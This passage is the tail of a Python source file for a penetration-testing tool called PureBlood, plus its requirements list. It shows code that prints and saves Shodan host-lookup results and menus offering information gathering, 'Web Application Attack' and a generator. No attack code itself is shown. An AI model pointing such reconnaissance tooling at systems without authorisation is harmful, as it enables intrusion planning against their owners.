wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A'))) 2562 | print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan)) 2563 | shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan)) 2564 | for i in wp_shodan_host_lookup['data']: 2565 | print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5} 2566 | {1}[{2}+{1}] {3}- {4}Port:{0} {6} 2567 | {1}[{2}+{1}] {3}- {4}Transport:{0} {7} 2568 | {1}[{2}+{1}] {3}- {4}Data:{0} 2569 | {8} 2570 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data'])) 2571 | shodan_host_lookup_output.write("""[#] - Timestamp: {5} 2572 | [+] - Port: {6} 2573 | [+] - Transport: {7} 2574 | [+] - Data: 2575 | {8} 2576 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data'])) 2577 | shodan_host_lookup_output.write('\n\n') 2578 | shodan_host_lookup_output.close() 2579 | print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename) 2580 | print (reset) 2581 | print ('{0}='.format(red) * int(sizex)) 2582 | web_pentest() 2583 | elif choice == 90: 2584 | main() 2585 | elif choice == 95: 2586 | print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan)) 2587 | if sys.version_info[0] == 3: 2588 | target = str(input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2589 | if sys.version_info[0] == 2: 2590 | target = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red))) 2591 | if '://' in target: 2592 | ohostname = target.replace('https://', '').replace('http://', '') 2593 | else: 2594 | ohostname = target 2595 | web_pentest_output = ohostname + '-' + month + mday + '.txt' 2596 | web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+') 2597 | web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n') 2598 | set_target(target, 1) 2599 | elif choice == 99: 2600 | print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output) 2601 | print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2602 | sys.exit() 2603 | else: 2604 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 2605 | time.sleep(2) 2606 | print ('') 2607 | web_pentest() 2608 | 2609 | 2610 | 2611 | def main(): 2612 | print ("""{3}[ {5}PureBlood Menu {3}] 2613 | 2614 | {2}01{3}) {5}Web Pentest / Information Gathering 2615 | {2}02{3}) {5}Web Application Attack 2616 | {2}03{3}) {5}Generator 2617 | {2}99{3}) {5}Exit 2618 | {0}""".format(reset, red, green, blue, yellow, cyan)) 2619 | if sys.version_info[0] == 3: 2620 | try: 2621 | choice = int(input('{0}PureBlood{1}> {2}'.format(green, blue, cyan))) 2622 | except KeyboardInterrupt: 2623 | print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2624 | sys.exit() 2625 | except ValueError: 2626 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2627 | time.sleep(2) 2628 | print ('') 2629 | main() 2630 | elif sys.version_info[0] == 2: 2631 | try: 2632 | choice = int(raw_input('{0}PureBlood{1}> {2}'.format(green, blue, cyan))) 2633 | except KeyboardInterrupt: 2634 | print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2635 | sys.exit() 2636 | except ValueError: 2637 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow)) 2638 | time.sleep(2) 2639 | print ('') 2640 | main() 2641 | if choice == 1: 2642 | web_pentest() 2643 | elif choice == 2: 2644 | web_application_attack() 2645 | elif choice == 3: 2646 | generator() 2647 | elif choice == 99: 2648 | print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow)) 2649 | sys.exit() 2650 | else: 2651 | print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow)) 2652 | time.sleep(2) 2653 | print ('') 2654 | main() 2655 | 2656 | 2657 | 2658 | if __name__ == '__main__': 2659 | create_directories() 2660 | clear() 2661 | banner() 2662 | main() 2663 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | requests 3 | python-whois 4 | dnspython 5 | bs4 6 | shodan 7 | --------------------------------------------------------------------------------